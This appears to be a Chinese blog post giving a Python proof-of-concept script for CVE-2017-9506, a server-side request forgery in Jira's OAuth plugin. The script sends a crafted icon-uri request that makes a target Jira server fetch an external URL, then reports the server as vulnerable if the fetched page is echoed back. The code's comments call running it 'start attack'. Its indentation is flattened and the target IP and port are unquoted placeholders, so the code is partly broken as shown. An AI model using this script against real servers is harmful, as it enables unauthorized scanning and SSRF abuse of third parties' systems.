cve-2017-9506 SSRF漏洞
·
import sys
import re
import requests
from time import sleep
FILE = "/plugins/servlet/oauth/users/icon-uri?consumerUri=https://www.baidu.com" #漏洞目标路径,如果成功会回显百度网站页面
session = requests.Session()
def grab_file (IP,PORT,FILE):
print ("[*] Testing: "+IP+" on Port: "+PORT+"[*]\n")#目标IP、端口port
try:
URL = "https://"+IP+":"+PORT+""+FILE+""
headers = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0","Connection":"close","Accept-Language":"en-US,en;q=0.5","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Upgrade-Insecure-Requests":"1"}
response = session.get(URL, headers=headers, timeout=15, verify=False)#建立连接
result = response.text#拿到回显
if '/images/branding/product' in result:
print ("[*] Jira... Found [*]\n")
print (result)
else:
print ("[*] Not Vulnerable [*]\n ")
except KeyboardInterrupt:
print ("Ctrl-c pressed ...")
sys.exit(1)
except Exception as e:
print (e)
print ("[*] Nothing Found on IP:"+IP+" [*]\n")
try:
IP = xx.xx.xx.xx
PORT = xxxx
grab_file (IP,PORT,FILE) #开始攻击
except KeyboardInterrupt:
print ("Ctrl-c pressed ...")
sys.exit(1)
except Exception as e:
print('Error: %s' % e)
sys.exit(1)
更多推荐



所有评论(0)